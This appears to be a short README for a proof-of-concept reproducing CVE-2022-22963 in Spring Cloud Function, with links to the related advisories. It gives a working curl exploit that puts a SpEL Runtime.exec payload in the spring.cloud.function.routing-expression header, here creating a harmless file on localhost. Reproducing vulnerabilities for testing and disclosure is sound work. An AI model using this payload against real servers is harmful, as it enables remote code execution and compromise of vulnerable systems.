CVE-2022-22963 RCE PoC

Minimal example to reproduce CVE-2022-22963 remote code execution in org.springframework.cloud:spring-cloud-function-core.

Exploit

Run the server

mvn spring-boot:run

Make a request

curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter

As a result of the exploit file PWNED will be crated nearby pom.xml.

Additional info

• Original advisory: https://tanzu.vmware.com/security/cve-2022-22963
• Snyk advisory: https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKCLOUD-2436645
• This PoC is based on: https://github.com/Pizz33/Spring-Cloud-Function-SpEL